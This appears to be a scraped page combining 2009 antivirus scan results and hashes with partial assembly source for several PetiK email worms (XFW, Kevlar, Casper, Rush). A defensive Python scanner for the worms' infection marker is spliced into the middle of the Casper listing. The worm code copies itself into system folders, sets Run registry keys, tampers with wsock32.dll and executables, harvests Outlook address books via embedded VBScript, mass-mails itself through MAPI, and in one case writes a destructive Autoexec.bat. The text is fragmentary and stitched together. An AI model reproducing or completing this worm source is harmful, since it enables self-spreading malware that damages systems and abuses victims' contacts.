AVG 8.5.0.336 2009.05.15 I-Worm/Petik.D
BitDefender 7.2 2009.05.16 Win32.Matoleya.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Worm.Petik-1
Comodo 1157 2009.05.08 Worm.Win32.Petik.F
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.12288
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.12288
F-Prot 4.4.4.56 2009.05.16 W32/Malware!8c02
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Sabak.A!worm.im
GData 19 2009.05.16 Win32.Matoleya.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.4
Microsoft 1.4602 2009.05.16 Worm:Win32/Pet_tik.E@mm
NOD32 4080 2009.05.15 Win32/Petik.F
Norman 6.01.05 2009.05.16 W32/Pet_Tick.12288.A
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.F
PCTools 4.4.2.0 2009.05.16 VBS.Petik.F
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.q
Sophos 4.41.0 2009.05.16 W32/Petik-E
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.G
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.12288
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.12288
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.F
Additional information
File size: 12288 bytes
MD5...: eb7bea183626119bc54c4ab1de80c606
SHA1..: 1f022ad7156e8d510168b7ba441afeb966edb828
comment #
Name : I-Worm.XFW (Extra French Worm)
Author : PetiK
Date : July 10th - August 3th
Size : 5632 byte (compressed with UPX)
Action: It copies itself to \SYSTEM\Services.exe. It adds a value in the run services key :
"Run Services"="\SYSTEM\Services.exe". It alters the "run=" line in the WIN.INI file.
It copies the file WSOCK32.DLL to WSOCK32.PTK and alters the original file by writing
"PetiK" into it. It displays a message and creates \WINDOWS\Tool_PetiK.txt.
This file explains how to repair WSOCK32.DLL.
If the worm is located in the \SYSTEM folder, it searches all DLL files in the
current folder (SYSTEM here) and drops a copy of itself next to each of them with the
".EXE" extension added :
FILE.DLL ==>> FILE.DLL.EXE
At the end, if the computer is connected, it creates a VBS file to spread with
Outlook.
To delete : del \WINDOWS\SYSTEM\Wsock32.dll
ren \WINDOWS\SYSTEM\Wsock32.ptk \WINDOWS\SYSTEM\Wsock32.dll
del \WINDOWS\SYSTEM\Services.exe
del \WINDOWS\SYSTEM\*.dll.exe
del \WINDOWS\Tool_PetiK.txt
remove what follows run= in the WIN.INI file
del C:\.vbs
.586p
.model flat
.code
;JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
push 01h
push offset n_wsck
push offset a_wsck
callx CopyFileA
test eax,eax
jz FIN
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset a_wsck
callx CreateFileA
inc eax
jz FIN
dec eax
mov WsckHdl,eax
xor eax,eax
push eax
push eax
push eax
push 04h ; PAGE_READWRITE
push eax
push WsckHdl
callx CreateFileMappingA
test eax,eax
jz FIN2
mov WsckMap,eax
xor eax,eax
push eax
push eax
push eax
push 06h ; SECTION_MAP_WRITE or READ
push WsckMap
callx MapViewOfFile
test eax,eax
jz FIN3
mov WsckView,eax
mov esi,eax
cmp byte ptr [esi+12h],"P"
je FIN3
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
INF_DLL:
D_INF: push 50
push offset szCurFolder
callx GetCurrentDirectoryA
push offset szCurFolder
callx SetCurrentDirectoryA
FFF: push offset Search
@pushsz "*.dll"
callx FindFirstFileA ; search all DLL files
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"EXE." ; and add .EXE => file.dll.exe
stosd
xor eax,eax
stosd
push 01h
push offset Search.cFileName
push offset szOrig
callx CopyFileA ; and copies with the main worm
test eax,eax
jz S_P
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
FC: push [htmlHdl]
callx FindClose
popad
F_INF:
@pushsz "http://www.whitesonly.net"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.kkk.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.front-national.fr"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.lepen-tv.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
@pushsz "http://www.hammerskins.com"
push offset Page
callx lstrcmp
test eax,eax
jz FORMAT
jmp INET
FORMAT: pushad
push 00h
push 20h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Autoexec.bat"
callx CreateFileA
mov edi,eax
push 00h
push offset octets
push BATSIZE
push offset batd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
jmp FIN
push 40h
@pushsz "Internet"
@pushsz "You're connected"
push 00h
callx MessageBoxA
VBS: pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\Win.vbs"
callx CreateFileA
mov edi,eax
push 00h
push offset octets2
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 01h
@pushsz "wscript C:\Win.vbs"
callx WinExec
push 30 * 1000
@pushsz "C:\Win.vbs"
callx DeleteFileA
.data
; ========== INSTALLATION ==========
a_wsck db 50 dup (0)
n_wsck db 50 dup (0)
szCopie db 50 dup (0)
szOrig db 50 dup (0)
Winini db 50 dup (0)
windir db 50 dup (0)
octets dd ?
; ============ INFECTION 1 ===========
WsckHdl dd ?
filesize dd ?
WsckMap dd ?
WsckView dd ?
; ============ INFECTION 2 ===========
htmlHdl dd ?
szCurFolder db 50 dup (0)
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
end DEBUT
end
File XFW.exe received on 05.16.2009 20:03:58 (CET)
Additional information
File size: 5632 bytes
MD5...: ca27691bf2137dc610588dd9f09de3b2
SHA1..: 5b1aac1f8783d4123f3b88c213bc8321dc8d6a4a
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Kevlar
Author : PetiK
Date : August 7th - August 16th
Language : ASM
Size : 5120 byte
Action : Copy itself to %System%\Kevlar32.exe hidden attribute
%System%\MScfg32.exe normal attribute
Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe
Attachment : MScfg32.exe
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
F_NAME: push 50
mov esi,offset Orig
push esi
push 0
callx GetModuleFileNameA
push esi
callx GetFileAttributesA
cmp eax,1
je SUITE
push 0
push edi
push esi
callx CopyFileA
push 01h
push edi
callx SetFileAttributesA
REG: pushad
@pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov edi,eax
@pushsz "SHSetValueA"
push edi
callx GetProcAddress
test eax,eax
jz FIN
mov esi,eax
push 08h
push offset CopyName
push 01h
@pushsz "Kevlar32"
@pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call esi
push edi
callx FreeLibrary
popad
call Nick
mov edi,offset nickname
push 40h
@pushsz "Hello, my name is :"
push edi
push 0
callx MessageBoxA
call Infect
jmp FIN
Nick Proc
mov edi,offset nickname
callx GetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
name_g:
push ecx
callx GetTickCount
push 'Z'-'A'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'A'
stosb
callx GetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
callx Sleep
pop ecx
loop name_g
ret
Nick EndP
Infect Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF:
push offset Search
@pushsz "C???????.exe"
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [exeHdl],eax
I_FILE:
mov verif,0
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset Search.cFileName
callx CreateFileA
inc eax
jz FNF
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
jz CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 06h
push ebp
callx MapViewOfFile
test eax,eax
jz CL2
xchg eax,edi
mov esi,eax
cmp word ptr [esi],"ZM"
jne CL2
cmp byte ptr [esi+18h],"@"
jne CL2
cmp word ptr [esi+80h],"EP"
jne CL2
cmp byte ptr [esi+12h],"P"
je CL2
mov word ptr [esi+12h],"eP"
mov word ptr [esi+14h],"it"
mov byte ptr [esi+16h],"K"
inc verif
push edi
callx UnmapViewOfFile
CL2:
push ebp
callx CloseHandle
CL1:
push ebx
callx CloseHandle
cmp verif,1
jne FNF
mov edi,offset InfoFile
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'iSM\'
stosd
mov eax,'3ofn'
stosd
mov eax,'xt.2'
stosd
mov al,'t'
stosb
pop edi
mov esi,edi
push esi
@pushsz "Infected by W32.Kevlar.PetiK"
push offset Search.cFileName
@pushsz "File Infected"
callx WritePrivateProfileStringA
FNF:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE
FC:
push [exeHdl]
callx FindClose
F_INF:
popad
ret
Infect EndP
Infect2 Proc
pushad
push 50
push offset WinPath
callx GetWindowsDirectoryA
push offset WinPath
callx SetCurrentDirectoryA
FFF2:
push offset Search
@pushsz "*.exe"
callx FindFirstFileA
inc eax
je F_INF2
dec eax
mov [exeHdl],eax
I_FILE2:
pushad
mov edi,offset Search.cFileName
push edi
callx lstrlen
add edi,eax
mov eax,"mth."
stosd
xor eax,eax
stosd
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset Search.cFileName
callx CreateFileA
test eax,eax
xchg ebp,eax
push 00h
push offset octets
push HTMSIZE
push offset htmd
push ebp
callx WriteFile
push ebp
callx CloseHandle
popad
FNF2:
push offset Search
push [exeHdl]
callx FindNextFileA
test eax,eax
jne I_FILE2
FC2:
push [exeHdl]
callx FindClose
F_INF2:
popad
ret
Infect2 EndP
OPEN: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset addbook
callx CreateFileA
inc eax
je NO
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3 ; is the file empty ??
call SCAN
SCAN:
pushad
xor edx,edx
mov edi,offset m_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"!"
je f_mail
cmp al,"@"
je not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je SCAN
call SEND_MAIL
jmp SCAN
entr2: xor al,al
stosb
pop edi
jmp SCAN
f_mail: popad
ret
SEND_MAIL:
push 50
push offset save_addr
callx GetWindowsDirectoryA
@pushsz "\MSinfo32.txt"
push offset save_addr
callx lstrcat
push offset save_addr
@pushsz "Next victim"
push offset m_addr
@pushsz "EMail saved"
callx WritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; ===== INSTALLATION =====
Orig db 50 dup (0)
CopyName db 50 dup (0)
CopyName2 db 50 dup (0)
nickname db 11 dup (?)
; ===== INFECTION =====
InfoFile db 50 dup (0)
WinPath db 50 dup (0)
exeHdl dd ?
verif dd ?
octets dd ?
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd NameFrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset CopyName2
dd ?
dd ?
htmd:
db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah
db '<script language=vbscript>',0dh,0ah
db 'on error resume next',0dh,0ah
db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah
db 'If err.number=429 then',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>'
db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>'
db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah
db 'Else',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'document.write "<font face=''verdana'' size=''3'' color=red>'
db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah
db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>'
db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah
db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah
db 'End If',0dh,0ah
db '</script></html>',00h
HTMSIZE = $-htmd
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah
db 'c.WriteLine "!"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
end DEBUT
end
File Kevlar.exe received on 05.16.2009 17:43:00 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Kev
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!c6f1
Avast 4.8.1335.0 2009.05.15 Win32:Kevlar
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.H
BitDefender 7.2 2009.05.16 Generic.Malware.GSMsp!.411C2399
CAT-QuickHeal 10.00 2009.05.15 W32.Petik
ClamAV 0.94.1 2009.05.16 Win32.Pet_Tick.M
Comodo 1157 2009.05.08 Worm.Win32.Petik.L
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Kevlar
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c6f1
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 JS/KEVLAR.A
GData 19 2009.05.16 Generic.Malware.GSMsp!.411C2399
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 Artemis!95EC22B0B688
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Kev
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.M@mm
NOD32 4080 2009.05.15 Win32/Petik.L
Norman 6.01.05 2009.05.16 W32/Pet_Tick.5120
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.C
PCTools 4.4.2.0 2009.05.16 I-Worm.Petik.I1
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Trojan.Petik
Sophos 4.41.0 2009.05.16 W32/Kevlar
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
Symantec 1.4.4.12 2009.05.16 W32.Pet_Tick.M
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.M
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petik.I1
Additional information
File size: 5120 bytes
MD5...: 95ec22b0b68815a9bf6def95e5c3b9b1
SHA1..: 00dbadea4b400e6e0ae58951d063a4943fd1fc8d
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 byte (compressed with UPX tool)
dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
Main_Worm:
call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm
Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax
jnz Connected_
mov edi,offset casper_mail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd
call Spread_Worm
Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz End_Hide
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz End_Hide
push 1
push 0
call ecx
End_Hide:
popad
ret
Hide_Worm endp
Check_Wsock proc
Search_Wsock:
push 50
mov edi,offset wsock_file
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax
File_Mapping:
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
callx CreateFileMappingA
test eax,eax
jz Close_File
mov wsckmap,eax
xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax
mov wsckview,eax
Old_Infect:
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File
Infected_By_Happy:
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Infected_By_Icecubes:
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile
Already_Infected:
inc verif
jmp UnmapViewOfFile
UnmapView_File:
push wsckview
callx UnmapViewOfFile
Close_Map_File:
push offset wsckmap
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp
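The listings above all key on the same infection mark: the XFW wsock32 infector and Kevlar's Infect write "PetiK" over the DOS header at offset 12h, and Casper's Check_Wsock tests offset 12h and 38h for the marks of other worms before touching the file. The Python below is an added example for the defender's side, not code from PetiK's archive: it reads the marker table from those listings, checks the PE signature via e_lfanew instead of assuming it at 80h as the Infect routine does, and builds its own test image inline.

```python
import struct

# Infection marks taken from the listings on this page: the wsock32 infector and
# Kevlar's Infect write "PetiK" over the DOS header at offset 12h (e_csum, e_ip and
# e_cs, fields the Win32 PE loader ignores); Casper's Check_Wsock additionally treats
# "z" at 12h and "ll" at 38h as the marks of I-Worm.Happy and I-Worm.Icecubes.
MARKERS = (
    (0x12, b"PetiK", "PetiK mark (XFW wsock32 infector / I-Worm.Kevlar)"),
    (0x12, b"z", "Happy mark, as tested by Casper's Check_Wsock"),
    (0x38, b"ll", "Icecubes mark, as tested by Casper's Check_Wsock"),
)


def is_pe_image(data: bytes) -> bool:
    """MZ signature plus PE\\0\\0 at e_lfanew (read from 3Ch, not assumed to be 80h)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def scan_dos_header(data: bytes) -> list:
    """Return the label of every known mark present in the DOS header of a PE image."""
    if not is_pe_image(data):
        return []
    return [label for off, sig, label in MARKERS if data[off:off + len(sig)] == sig]


def scan_file(path: str) -> list:
    """Scan one executable on disk (reads the whole file; fine for small binaries)."""
    with open(path, "rb") as fh:
        return scan_dos_header(fh.read())


def build_sample(marked: bool) -> bytes:
    """Constructed minimal PE-like image for testing: DOS header, PE signature at 80h."""
    img = bytearray(0x84)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\0\0"
    if marked:
        img[0x12:0x17] = b"PetiK"  # exactly what the Infect routine writes
    return bytes(img)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        hits = scan_file(path)
        print(path, "->", ", ".join(hits) if hits else "no known marks")
```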
Copy_Worm proc
pushad
Original_Name:
push 50
mov esi,offset original
push esi
push 0
callx GetModuleFileNameA
Copy_Name:
mov edi,offset copy_name
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
push 08h
push edi
push 01h
@pushsz "Winsock32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp
Prepare_Spread_Worm proc
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp
Spread_Worm:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
cmp eax,03h
jbe F3
call Scan_Mail
.data
; ===== Main_Worm =====
wsock_file db 50 dup (0)
; ===== Check_Wsock =====
wsckhdl dd 0
wsckmap dd 0
wsckview dd 0
PEHeader dd 0
warning db "Warning : You're infected by",00h
verif dd ?
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset m_addr
dd offset m_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset original
dd offset mail_name
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
end DEBUT
end
File Casper.exe received on 05.16.2009 11:21:10 (CET)
Additional information
File size: 6144 bytes
MD5...: 87e2b361908ac17e03ae947c75a140a2
SHA1..: f038e389ea778594125222e97d82a0a2c1404986
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 byte (compressed with the UPX tool)
Attached : ScanVir_25.exe
* Scans window titles :
- Norton AntiVirus => title replaced by "Norton Virus : W32.Norton.Worm@mm"
- System Properties => minimizes the window
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
;call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA
push 0
push edi
push esi
callx CopyFileA
push 8
push edi
push 1
@pushsz "Mail Outlook"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
check_date:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne beep1
cdrom_open:
push 00h
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA
special_folder:
push 00h
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"
push offset personal
callx lstrcat
txt_file:
push 00h
push 01h
push 02h
push 00h
push 01h
push 40000000h
push offset personal
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\rushhour.vbs"
callx WinExec
push 2000
callx Sleep
@pushsz "C:\rushhour.vbs"
callx DeleteFileA
call internet_page
start_scan:
mov edi,offset mailbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,"ooBl"
stosd
mov eax,"xt.k"
stosd
mov ax,"t"
stosd
xor eax,eax
stosd
open_scan_file:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset mailbook
callx CreateFileA
inc eax
je not_exist
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je F2
